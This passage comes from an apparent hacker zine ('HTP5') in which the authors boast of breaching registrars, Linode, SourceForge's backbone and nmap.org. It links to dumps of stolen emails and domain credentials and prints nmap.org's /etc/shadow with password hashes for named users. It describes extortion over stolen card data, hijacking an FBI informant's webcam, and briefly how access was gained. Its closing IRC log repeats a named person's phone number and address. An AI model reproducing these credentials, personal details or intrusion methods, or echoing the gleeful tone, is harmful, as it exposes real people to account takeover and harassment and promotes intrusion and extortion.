  382. root-servers.org is an EDU domain. This effectively gave us control over
  383. root-servers.org. However, ICANN is responsible for the root zones file.
  384.  
  385. ICANN was already compromised by that time, though, joined by several of the
  386. major RIR's (RIPE, LACNIC, etc.) along with bgp+shell access and 13,000+
  387. backbone AS's (some of which persists to this day) & the InterNIC. Surprisingly,
  388. they used passwordless private keys stored on their servers to ssh into the
  389. internal Juniper routers as superusers: only 3 networks away and not even phys
  390. sep. Nothing proxychains can't handle. They probably should've checked their
  391. netscreens before it was too late. :P
  392.  
  393. None of this access was ever used, but we did get to see some pretty funny
  394. shit. In the backbone of SourceForge (Savvis), for example, we ran into some
  395. old SunOS Sparc boxes with 1900+ day uptime. They had passwordless private key
  396. auth, and the kernels were fairly ancient (and in the absence of all file
  397. transfer utils, `whois` coupled with a few pipes worked great to transfer tgz's
  398. served from port 43 - no file editing required). As it turns out, we were not
  399. the first ones there. On their Phoenix, AZ stats server, some random hacker was
  400. kicking back in /var/tmp/.access_logx/ with a psyBNC connected to Undernet. On
  401. SourceForge's backbone -- LOL? We don't think he fully realized what he had
  402. breached. Or maybe he just really needed a psyBNC server. Either way, he'll
  403. probably have to end up getting a new psyBNC after today. On Github or
  404. something.
  405.  
  406. Enjoy the MIT emails/EDUCAUSE login data, included in this segment of
  407. HTP5:
  408.  
  409. ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
  410. ~ http://mirror.hack-the-planet.tv/HTP-5/MIT-EDUCAUSE/mit.zip
  411. |- 2.6GB | Zip compressed MIT emails
  412. ~ http://mirror.hack-the-planet.tv/HTP-5/MIT-EDUCAUSE/EDUDOMAINS.rpt
  413. |- 28MB | EDUCAUSE database: extracted domain credentials
  414. ~ http://mirror.hack-the-planet.tv/HTP-5/MIT-EDUCAUSE/EDUCAUSE-MISCDBS.zip
  415. |- 12MB | EDUCAUSE misc. databases extracted from 6.4GB MSSQL tape backup
  416. ~ http://mirror.hack-the-planet.tv/HTP-5/MIT-EDUCAUSE/eduhashindex.txt
  417. |- 143K | EDUCAUSE domain passwords, allow account/DNS modification.
  418. | | For use with /HTP-5/MIT-EDUCAUSE/EDUDOMAINS.rpt
  419. ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
  420.  
  421.  
  422. ▄▄ ▀▄▄▒▒▒▒▒▒▒▒▒▒▒▒▒░ ░▒▒▒▒▒▒▒▒▒░░ ▒▒▒▒▒▒▒▒▒▒▒▒░ ▒▒▒▒▒▒▒▒▒▒░ ░░░░░ ░░ ░ ░░
  423. ▒▒█▄▄ ▀▀▄▄ ░ ▒▒▒▒▒▒░░░▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓▒▒▒▒▒▒▒ ░░░░░░░░░░░ ░░░░ ░░░░
  424. ▓▒▒▒▒██▄▄ ▀▄▄ ▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒ ░░░░░░░░ ░░░░░░░░░░ ░
  425. ▓▓███▓▓▒███▄░▀▄▄ ▒▒▒▒▒▒▒▒▒▒▒▒ ░░░░░░ ░░░░░▄▄▄▄▀▀
  426. ▓▓█████████▓▒▄▄ ▀▀▀▄▄▄▒▒▒▒ ░░░░░░ ░ ░░░▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▀▀▀▀░▒▒▒▓
  427. ▒▒▓▓██████████▓▓▓▒▄▄ ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▄▄▄▄▄▄▀▀▀▀▀▀▀ ▒▒▒▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▓▓▓█████
  428. ▒▒▒▓▓█████████▓▀▀▀▀▀▀▀▀▄▄▄▄▄▄▄▄▄▄▄▄▒▒▒▄▄▄▄▄▄▄▄▄▀▀▀▀▀▀▀▀▀▀▀▀▒▒▒▒▒▒▒▒░░░▒███▓▓████
  429. ▒▒▒▓██████████▒░░░░░░▒▒▒▒▒█████████████▓ ▒▒▒▒▒▒▒░░░ ░░░░░░░▒▒▓▓▓▓▓▓▒▒░░▒███▓████
  430. ▒▒▒▓▓█▓▒▒▒▀▀▀▀▀▀▄▄▄▄▄▄▄▄▒████████████████▒▀▀▀▀▀▄▄▄▄▀▀▀▀▀▀▒▓███████▒░▓██▒░▒█▓▓███
  431. ▒▒▒▓████████▓▒░░░░░░░██▒█████████████████▓░▒▒▒▒▒▒▒▒▒▒▒▒░▓████████▒ ▓███▒░░▒███▓
  432. ▒▒░▒██▒▓██████ ░░░░░░▓██████████████████▒░▒░░░░░░░░▒░▒████████ ▒████▓░░▓▓▓▓▒
  433. ░▒░░▓█░░▒▒▓██▓ ░░░░ ░███████████████████▒░ ▄ ▄▄ ▄░░███████▓ ░ ▓██████▓░▓▒▒▒░
  434. ░░░░▒█░░░░▒▓▓░░ ░░ ▒██████████████████▒▀▀▀▀▀░░▀▀▀▀▄██████▒ ░ ▓███████▒ ▓░
  435. ░ ░█▒ ░░▒▒░░ ░░░▒█████████████▓▓█▒▀░░░░░░░░░░░▀▒████▓ ▓██████▓░░ ▓
  436. ░░ █▒ ▒▒ ░░░░▓█████████▒▒▒░░░░░░░░ ░░░░░░░▒███▒▒▒███████▓ ░ ▓
  437. ░░░ ▓▒ ▒ ░▒ ░░ ░░▀▀▓▓▓▓▒░░░░░░░░░░ ░░ ░░░ ▒▓▓▓▓▓███▓▒▒ ░░ ▓
  438. ░ ▓▒ ▒▒ ▒▒░ ░░░░░░░░░░░░░░░░░ ░░ ░ ▒▓
  439. ░ ░░▓ ░░ ░▒░░ ░░ ░░░░░░ ░░░ ░░░░░ ░ ░▒ ▒
  440. ░░ ▓ ░░▒▒░░ ░░ ░░░░░ ░░░░ ░▒ ▓
  441. ░▓ ░▒▒░░ ░░░ ░░ ░░░ ░░ ░ ▒ ▒░
  442. ▓▒ ░░▒▒░░░ ░░░░░░░ ▀▀▀▄▒▒░░░░▒▄▀▀ ░ ▒ ▒
  443. ▒▓░░░░░░▒▒▒░░░░ ░░░░░░░ ░░░▒▒▓▒▒▒▒▓▓▓▓▓▒░░ ░▒ ▓
  444. ▒▓ ░░ ░▒▒░░░░░ ░░░▒▒▒▒▒▒▒▓▓█▓▒▒▒▒▒▒▒▒▒▓█▓▓▓▒░ ░▒ █░
  445. ▓░ ░▒▓▒░░░░░ ░░░▒▒▓▓▒▒▒▒▒▒▒░░ ░ ░░░▒▒▒██▒░ ░░▒░▒▒
  446. ▒▓ ░▒▓▓▒▒░░░░ ░░▒▒▒▒▒░░░░ ░░░░░░░░░ ░░ ░▒▓█▒ ░▒▒░▓
  447. ▒▓ ░ ▒▒▒▒▒░░░ ░░▒▒▒▒▒░░░░░░░░░▒▒▒▒▒▒░░░░░░░▒▒▒▒ ░▒▒▒▒▒
  448. ▒▒ ░ ▒▒▒░░░░ ░░▒▒░░░░▄▄▄▄▀▀▀▀▀▓▓█▀▀▀▄▄▄▄▒▓░░▒░ ░░▒▒░▒
  449. ▒▓ ░ ▒▒▒▒▒▒░░ ░▒▒░░░░ ░░░░ ░ ░░░ ░▒▒ ░░▒▒░ ▒
  450. ▒▒ ░ ▒▒▒▓▒▒░░ ░▒░░░░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒░░ ░░░░▒▒▒▒▒▒░░ ▒
  451. ▓▒░▒░░ ░▒▒▓▓▒▒░░ ░▒░░░░░░░░░▒░▒▒▒▒▒▒▒▒░░░░░░░▒▒▓██▓▒ ░▒
  452. ░▒▓▓▒▒▒▒▒ ░▒▒▓▓▓▒▒░░░░░▒▓▒░ ░░░░▒░▒▒▓▓▒▒▒▒▒░░░░▒▒▓████▒ ░▒▒░
  453. ░▒▒▒▓▓▒▒▒▓▒░ ░▒▓▓▓▓▓▒▒░░░▒▒▓▒▒▒░░░▒▒░▒▒▓▓▓▓▒▒▒▒░▒▒▒▓████▓░ ░▒▒░░
  454. ░▒▒▓▒▒▒▓▓▓▓▓▓▒ ░ ▒▒▓▓▓▓▓▒▒▒▓▓▒▓▒▒▒▒▒░▒▒▒▓▓████▓▓▓▓▓▒▓████▓▒░ ░▒▒▒░░░░░
  455. ░▒▒▓▒▒░░▒▒█▓▓▓▓▒ ░░ ░▒▒▓███▓▓▓▓▓█▓▒▒▒▒▒▒▒▓▓▓▓███▓▓████████▒▒ ░▒▒▒▒▒░░░░░░
  456. ░▒▒▒▒ ▒▒▓█▒▒▓▒░ ░ ░ ░▒▒██████████▓▓▓▒▒▓████████████████▒▒ ░ ░▒▒▒▒▒▒░ ░░░
  457. ▒▒▒▒░ ▒▒▒▒▓▒▓▓▒░ ░ ░░▒▓▓█████████▓▓▓▓███████████████▓▒░ ░▒▒▒▒▒▒░
  458. ▒▒░ ▒▒▒▒▒█▓▓▒▒ ░░▒▒▒██████████████████████████▓▒▒ ▒▒▒▒▒▒▒░░
  459. ▒ ░░░▒▒▒▓██▒▒▒ ░ ░ ░▒▒▒▓█████████████████████▓▒▒░ ░ ▒▒▒▒▒▒░░░ ░
  460. ░ ░ ░░░░▒▒▒▒▓█▒▒░░░ ░░░▒▒██████████████████▓▓▒▒░ ░ ░▒▒▒▒░░░░░ ░░
  461. ░ ░ ░░░ ▒▒▒▒▒▒▓▓▒░░ ░ ░▒▒▓███▓▓▓█████▓▓▓▓▓▒▒░ ░░▒▒▒░░░░░ ░░░░
  462. ░ ░░░░░░ ░▒▒▒▒▒▒▒▓▒ ░ ░▒▒▓▓▓▒▒▓▓▓▓▒▒▒▒▓▒▒░ ░░░▒▒▒▒░░░░ ░░░░░
  463. ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
  464. "I'm positive they owned."
  465. ░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
  466.  
  467. ▄▄ ▄▄ ▄▄ ▄▄ ▄▄▄▄▄ ▄▄▄▄ ▄▄▄▄
  468. ██ ██ ███▄██ ██ ██ ██ ██ ██▄▄ HTP5
  469. ██ ██ ██ ▀██ ██▄██ ██▄█▀ ██▄▄
  470. ██ ▄▄ ▄▄
  471. ▄▄▄████████▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
  472.  
  473. * Before reading this section of HTP5, we recommend you pop some popcorn.
  474.  
  475. Following HTP4, we were promptly attacked by the next set of skids looking to
  476. get baked by our terabit DDoS cannon. A group impersonating ac1db1tch3z decided
  477. to take an alternative route, and located us through the development of one of
  478. our botnets, Zodiac. We quickly switched into a fallback network and found out
  479. they used SwiftIRC. SwiftIRC's nameservers were none other than Linode.
  480.  
  481. Oh by the way, actual AB, was your second backdoor in Unreal that eval() shell
  482. stored in their PHPBB MySQL database? if so -- you've finally been expunged ;)
  483. - HTP
  484.  
  485. Linode turned out to be safe from our null RDS pass 1day (before Adobe had
  486. released their critical advisory). In the meantime, their registrar (name.com)
  487. was taken out. We acquired their domain login (along with StackOverflow,
  488. DeviantArt, etc.), and prepared a transparent proxy to gather Linode logins.
  489.  
  490. Speaking of registrars, Xinnet, MelbourneIT, and Moniker - you're all owned.
  491. Back in November, we hinted at Huawei access in our Symantec release. Their
  492. registrar? Xinnet. Total domains owned: about 5.5 million total. No kidding. :P
  493.  
  494. However, right in time, our very own HTP zeroday research division manifested
  495. subzero.py: a zeroday giving us a direct route into Linode. We proceeded to
  496. breach Linode and acquire their in-memory keys. This allowed us to download
  497. Linode's databases and prepare to backdoor SwiftIRC via the LiSH console+
  498. init=/bin/bash.
  499.  
  500. Meanwhile, we enjoyed our (root) access to Nmap, Nagios, SQLite, OSTicket,
  501. Phusion Passenger (modrails), Mono Project, Prey Project, Pastie, Sucuri, Hak5,
  502. Pwnie Express, Puppet, and oauth. It got better when we found Jen Emick and
  503. xnite were customers, but that's getting into another story.
  504.  
  505. Unknown to us at the time, the FBI had successfully accessed HTP. They made
  506. their presence obvious, as everything we would get was burned within a few days.
  507. However, we merely considered it to be a leak, and waited to use Linode itself
  508. to identify the source.
  509.  
  510. Soon after, the FBI alerted Linode that Nmap was being backdoored, unknowingly
  511. identifying themselves as the source of the leaks within HTP. We still
  512. considered it a leak, and told Linode that if they did not act upon our
  513. already-gained access by 5/1, we would shred all of our Linode-related data.
  514. This included 159,000+ decrypted CCs, usernames, $5 hashed passwords, LiSH
  515. usernames, plaintext LiSH passwords, and employee logins. In the case of
  516. noncompliance, we stated that we would drop it all in our release.
  517.  
  518. This was actually quite a good offer. We made it because we didn't care about
  519. CCs to begin with (that's directed at everyone on Twitter blaming Linode for
  520. identity theft) and because our primary target was SwiftIRC, not Linode. They
  521. accepted to protect their customer data/CCs (there wasn't much choice).
  522.  
  523. The FBI got pissed off by this development and forced Linode's hand. After
  524. informing them we would follow through and shred all of our Linode data within a
  525. week, the FBI and Linode coordinated a release detailing the breach in an email
  526. to their customers. We were confused. If they just did this on 5/1, nothing
  527. would be affected? Apparently, the FBI did not trust us. We soon found out
  528. Linode's situation was not voluntary.
  529.  
  530. Linode was between a rock and a hard place. They had to comply with the FBI
  531. (immediately), but doing so would mean all 159,000+ customers would be on Full
  532. Disclosure by 5/1. Recognizing their situation, we instead told them that if
  533. they acknowledged HTP in their analysis, we'd go ahead and shred their customer
  534. data anyway. Readily enabling carders was never part of our plan. They agreed,
  535. and we proceeded to delete our copies of the data for them.
  536.  
  537. There was one more loose end to tie. We identified which users on HTP were
  538. involved with the FBI, and promptly gained access to one of their cams. Sure
  539. enough, there was a handler standing behind him, monitoring his involvement
  540. in HTP (hi!).
  541.  
  542. The FBI lost their access into HTP.
  543.  
  544. So what's in this release, if not Linode? EDIT: Hahaha we guess that was too
  545. hot, we'll give you guys registrar data instead.
  546.  
  547. ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
  548. ~ http://mirror.hack-the-planet.tv/HTP-5/Linode/ss1.png
  549. |- 193K | Linode blog post screenshot 1
  550. ~ http://mirror.hack-the-planet.tv/HTP-5/Linode/ss2.png
  551. |- 179K | Linode blog post screenshot 2
  552. ~ http://mirror.hack-the-planet.tv/HTP-5/Linode/registrardata.txt
  553. |- 70K | Data on the registars mentioned above.
  554. ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
  555.  
  556.  
  557.  
  558.  
  559. ░░░░
  560. ░░░░░▒▒▒▒▒▒▒▒▒▒▒▒▒░░░
  561. ░░░▒▒▒▒░░░░░░░░░░░░▒▒▒▒▒▒░░░
  562. ░░▒▒▒▒░░ ░░░▒▒░░▒░░
  563. ░░░░░▒░░ ░░▒▒░░░▒░
  564. ░░░░░▒░░░ ░░▒░░░░░░
  565. ░░░▒░▒░▒░░ ░▒▒░░░░▒░░
  566. ░░░░▒▒▒░▓▒░▒░ ░░▒░░░░░░▒░
  567. ░░░░░░▓█▓█▓▒░░░ ░░▒░░░░░░░░▒░
  568. ░░░░░░▒▓████▓▒▒░░ ░░░▒░░░▒▒▒▒▒░░░░░░░░▒░
  569. ░░░░░░░▒▒███▓▓░░░ ░░░░░▒▒░░░▒░▒▒▒▓▓▓▓▒░░░░░░░░▒░░░
  570. ░░░░░░▒▒░░░▓█▓▒░▒ ░░░▒░░▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓▒░░░░░░░░░░░
  571. ░░░░░░▒▒░▒▒▒░▒▓▒░ ░░▒▒▒░▒▒▒▓▓▓▓▓▓█▓███▓▓▒░░░░░░░░░░░
  572. ░░░░░░░░░░▓▓▒▓▒░░░ ░░░▒▒▒▒▒░▒░░▒▒▒▓▓▓████▓▓░░░░░░░░▒▒░
  573. ░░░░░░░░▒░▒░░░▒▓▒░░ ░░▒░░░░░▒▒▒▒▒░░░▒▒▓▓▓███▓░░░░░░░░▒░░
  574. ░░░░░░░░░░▒▒░░▓█▓▒░ ░░▒▒▒▒░░▒▓▒▒░▒▒▒▒░░░▒░░▒▓▓▓▒░░░░░░▒░░
  575. ░░░░░░░░░░░▒░▒▒▓░░░░ ░▒▒▓▓▓▓▓▓▓▓▓█▓▒▒░░░▒▒▒▒░░░▒▒░░░░░░░▒▒░
  576. ░░░░░░░░░░░▒░░▒▒▒░░░░░░ ░░░░▓███████████████▓▓▒░▒▒▒▒▒░░▒▒░░░░▒▒░
  577. ░░░░░░░░░░░▒▒▒▒░░▒░░░░░░░░░░░▒▓▓███████████████████████▓▓▓▓▒▒░░░░░
  578. ░░░░░░░░░░░░░░░▒▒░░░░░░░░░░░░░░░░░▓████████████████████████▓▒▓▒▒▒░
  579. ░░░░░░░░░░░░░░░▒▓░▒░░░░░░░░░░░░░░░░▓██████████████████████████▓▓▒▒░
  580. ░░░░░░░░░░░░░░░░░░▓▓▒▒░░░░▒░▒░░░░░░░░▒████████████▓▒▒▓█████████▓▓▓░▒░
  581. ░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒▒░▒░░▒▒░░░░░░▒▒░░░░░░░▒▒▓███████▓▓▓▒▒▒▒█████████▓▓▒░▒░
  582. ░░░░░░░▓▓▓▒▒▓████████▓▒░░░░░░░▒▒▓▓▓▓░░▒░░░░░░▒▒▓▓▓▓▓▒▒░░░░░▓███████▓▓▓░░░
  583. ░░░░░░░░▒▒░░▒▓░▒███████▒░░░░░░░▒▒▓▓▓██▓░░░░░░░░░▒▓▓▒░▒░░▒░░░▒░██████▓▓▓░▒░
  584. ░░░░░░░░▒░██▓▓▓░░▓████▒░▒░░░░░░░░█▓▓▓▓▒▒▒▒▒▒▒▒▓▓▒▓▓▓▓▓▒▒░▒░░░▒▒████▓▓▒▒▒░
  585. ░░░░░░▒░▒▒█▓▓███▓░░▓█▓░▒▒▓▒▒░░░░▒█▓▓▒░▒░▒▒▒▒▒░░▒░░░▓█████▓███▓▒██▓▓▓▒▒▒░
  586. ░░░░░▒▒▓░▒▒▓▓▒▓███▒▒▓▒░░▒██▓░░░░▒██▓▒▒░░░▒▒░░░░░░░░░░▒▓██▓▓░▒▓███▒▓░░░░
  587. ░░░░▒▒░▒▓▒▒▒▓▓▒▓███▓░▒░░▒███▓▒░░░▓██▓▒▒░░░░░▒▒░░░░░░░░░▒█▓▓░▒▒▓▓▓▓░▒░
  588. ░░░▒▒▒▓▓▓▒▒▒▒░▓▓▒▓███▓▒▒▒▓███▓░░▒▒▓▓▒░▒▒░▒▒▒▓▓▓▓░▒▒▒▓▓▓▒▒▓▒░░▒░▓▓░░░
  589. ▒▒▒▓▓▓▓▓▓▒░░▒░▒▒▓░░▓██▓░▒▒▓██▓▓▒▒▓▓░░▒▒░░░▒░▓▓██▒▒▒▓███████▓░▒░▒░░░
  590. ░▒░░▒█▓▒▒▒░░▒▒▒░▒▓▒░▒▓█▓▓▒░▓█▓▓█▓▓▒▒░░░▒▒░▒▒▒░▓▓▓▓▓▓▓██▓▓▒▒▓█▒▒░▒░
  591. ▒░░▒▒░▒▓░▒▒▒░░▒▒▒▒▓▓▒▒▓██▓▒▒▒▓███▓▓░░░░▒▒▓▓▒░░▒▒███▓▓██▀▀▓▓▓█▓▒▒░
  592. ░░░░░▒▒░▒▓▒▒▒░▒░░▒▒▓▓▓▒▓█▓▓▒▒░▓███▓▓▒░░░▒▒▒▓▒▒▓▓████████████▓▒▒░
  593. ░▒▒░░░░▒▒▒▒▒░▒░░▒░░▓▓▓▓▓▓█▓▓▒░▒▒██▓██▓▒░░░░░░░▒░▒▒▒▓▓▓█████▓▒▒░
  594. ▒▒▒▒▒▒░░░▒░▒▒▒▒░░▒▒▓▓▓▓▓▓████▒▒▒▒▓█████▓▒▒▒▒▒░░░▒░░▒▒▒▓████▒▒░░
  595. ░▓▒▓▒▒▒▒░░░▒▒░▒▒░▒▓▓▓▓▓▓▓▓████▓▒░▓▓██▓█████▓▓▓▓▒▒▒▓▓▓▓███▓▒▒░░
  596. ░▒▓▓▓▒▒▒▒▒▒▒░▒░▒▒▒▒▓▓▒░▓▓▒▓████▓░▒▓▓█████████████████████▓░░░░
  597. ▒░▓░▓▒▒▒▒▒▒░▒░░▒▒▒▓▓▓▓▓░▒▒░▒▓███▓░░▒███████████████████▓░▒░▒░░
  598. ▒▓▓▒▓░▒▒▒▒▒▒▒▒▒░░░░▒▓▓▓▓▓▓▓░▒▒▓██▒▒░▓██████████████████▒▒░▒░░░░
  599. ▒█▓▓▒▒▒▒▒▒▒▒░▒▒░░▒▒░▒▓▓▓▓▓█▓▒▒▒▓██░▒▓▓████████████████▓▓▒░▒▒▒░░
  600. ░▓░░▒░░▒▒▒▒▒▒▒▒░▒▒░▒▒▓▓▓▓████▓▓▓██▓░▓▓▓███████████████▓▓▓░▒░░▒░░
  601. ░░▒▒▒░▒░▒▒▒▒▒░▒▒░▒░░▒░▒▓▒▒████▓████▒░█▓███████████████▓▓█▒▒░░░░░░░
  602. ░░░░░░▒▒░░░▒▒▒▓▒▒▒▓░▒▒▒▓▓▓█▓▓▓██████░█▓▓██████████████▓██▓▒░░░░░▒░░
  603. ░░░░░░▒▒▒▒▒░░▒▒▒░▒▒▒▒░▒▓▓▓▓██▓▓▓▓███▒▓█▓██████████████▒██▓▒▒░▒░▒░▒░░
  604. ░░░░░░░░░░░░░░░░░░░░▒▒░░░░▒░░░▒░░▒▒▒▒▓▒▓▓▓██▓▓▓▓▓██▓█▓░▒▒░▒▒░░░░░▒▒░░
  605. ░░░░░░░░░░░░░░░░░░░░░░░░░░░░▒░▒░▒▒░▒▒▒▒░░▒▒▒▒░░░░░▒▒░▒▒▓░░░▒▒░░
  606. ░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░▒░▒▒▒░░░░░░░░░▒▒░░
  607. ░░░░░░░░░░
  608. "You have to let it all go. Fear, doubt, and disbelief."
  609. ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
  610. ▄▄ ▄▄ ▄▄ ▄▄ ▄▄▄▄▄ ▄▄▄▄
  611. ███▄ ██ ██▀▄▀██ ██ ██ ██ ██ HTP5
  612. ██ ▀█▄██ ██ ▀ ██ ██▀██ ██▀▀
  613. ██ ▀██ ██ ██ ██ ██ ██ Whoa. Did we just backdoor Trinity?
  614. ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
  615.  
  616. Access to nmap.org (Insecure) was gained through Linode, which also included
  617. svn.nmap.org and Seclists. Based on our approximations, the FBI went into holy-
  618. shit mode beginning when we were backdooring it. We decided to withhold the
  619. private releases, including DARPA CINDER Nmap, and release to you the unabridged
  620. contents of the /home/ directory including those of Fyodor (Gordon Lyon) and
  621. David Fifield. Before we drop you into nmap.com, though, here's their
  622. /etc/shadow for those curious:
  623.  
  624. [root@web etc]# cat shadow
  625. root:$1$9e0033fd$9M4AIYi9o1.wcm07WGUTZ0:14746:0:99999:7:::
  626. bin:*:14746:0:99999:7:::
  627. daemon:*:14746:0:99999:7:::
  628. adm:*:14746:0:99999:7:::
  629. lp:*:14746:0:99999:7:::
  630. sync:*:14746:0:99999:7:::
  631. shutdown:*:14746:0:99999:7:::
  632. halt:*:14746:0:99999:7:::
  633. mail:*:14746:0:99999:7:::
  634. news:*:14746:0:99999:7:::
  635. uucp:*:14746:0:99999:7:::
  636. operator:*:14746:0:99999:7:::
  637. games:*:14746:0:99999:7:::
  638. gopher:*:14746:0:99999:7:::
  639. ftp:*:14746:0:99999:7:::
  640. nobody:*:14746:0:99999:7:::
  641. vcsa:!!:14746:0:99999:7:::
  642. ntp:!!:14746::::::
  643. sshd:!!:14746::::::
  644. fyodor:$1$71vbn0Qa$34cy/K1mp8ag4C7I3eXqS/:14782:0:99999:7:::
  645. david:$1$cVie3LDG$WOrypVpCcBl.UyA8TKRX20:14783:0:99999:7:::
  646. xfs:!!:14782::::::
  647. apache:!!:14782::::::
  648. web:!!:14782:0:99999:7:::
  649. postfix:!!:14782::::::
  650. webalizer:!!:14783::::::
  651. mysql:!!:14896::::::
  652. postgres:!!:14897::::::
  653. distcache:!!:14924::::::
  654. pcap:!!:15615::::::
  655. mailman:!!:15666::::::
  656.  
  657. Yep, those are $1. We'll give them the benefit of the doubt: Linode used AES.
  658. By the way, Fyodor, thanks for amis-6.01.DARPA1.tar.gz. We'll be sure to give it
  659. a spin.
  660.  
  661. AMIS - Adversary Mission Identification System
  662. ==============================================
  663. The Adversary Mission Identification System (AMIS) is a computer program
  664. that analyzes logs of network scans and reports possible signs of an
  665. adversary mission.
  666. The AMIS is designed to work with the logs produced by the Nmap Security
  667. Scanner. It is part of an overall defensive system that includes
  668. periodic scans and their analysis.
  669. The AMIS checks for these "tells" that may be signs of an insider
  670. mission:
  671. * Newly opened ports, particularly those of file servers (e.g. HTTP,
  672. FTP, and P2P services).
  673. * Differences in files shared by known file servers, including new
  674. files, deleted files, and changes in file metadata.
  675. * Security vulnerabilities in servers.
  676.  
  677. Enjoy this section of HTP5.
  678.  
  679. ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
  680. ~ http://mirror.hack-the-planet.tv/HTP-5/Nmap/home.tgz
  681. |- 16GB | Nmap.org: /home/
  682. ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
  683.  
  684.  
  685.  
  686. ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
  687.  
  688. <~REDACTED_1> lol
  689. <~REDACTED_1> i got a dmca from cloudflare
  690. <INFO> REDACTED_2 [REDACTED_2@HTP/user/REDACTED_2] has quit [Client exited]
  691. <~REDACTED_3> dmca?
  692. <~REDACTED_3> whats copyrighted
  693. <~REDACTED_1> Reporter's Name: Gordon Lyon
  694. <~REDACTED_1> Reporter's Email Address: [email protected]
  695. <~REDACTED_1> Reporter's Title: CTO
  696. <~REDACTED_1> Reporter's Company Name: Insecure.Com LLC
  697. <~REDACTED_1> Reporter's Telephone Number: 650-989-4206
  698. <~REDACTED_1> Reporter's Address: 370 Altair Way #113 Sunnyvale, CA US
  699. <~REDACTED_1> Reported URLs:
  700. <~REDACTED_1> http://straylig.ht/zines/htp5/0x03_nmap.txt
  701. <~REDACTED_1> Original Work: They released 16GB of our copyrighted data
  702. which they stole. I don't know if copyright applies to our password file,
  703. which they stole and released on this page, but it certainly applies to our
  704. Adversary Mission Identification System described on the page.
  705. <INFO> REDACTED_2 [REDACTED_2@HTP/user/REDACTED_2] has joined #thegibson
  706. <INFO> mode/#thegibson [+a REDACTED_2] by chippy1337
  707. <~REDACTED_3> well
  708. <~REDACTED_3> that would fit the bill
  709. <~REDACTED_3> lets call him up
  710. <~REDACTED_3> and take this
  711. <~REDACTED_3> to internet court
  712. <~REDACTED_3> im seriously considering
  713. <~REDACTED_3> printing this out
  714. <~REDACTED_3> and framing it on my wall
  715. <~REDACTED_3> cuz im lolin so hard
  716. <~REDACTED_3> 'sorry, there is a minimum requirement of 20GB before DCMAs are
  717. considered admissable in Internet Court'
  718. <&REDACTED_4> "What's that? You say there's a hostage situation in your
  719. apartment?! We'll call the police right away, sir."
  720.  
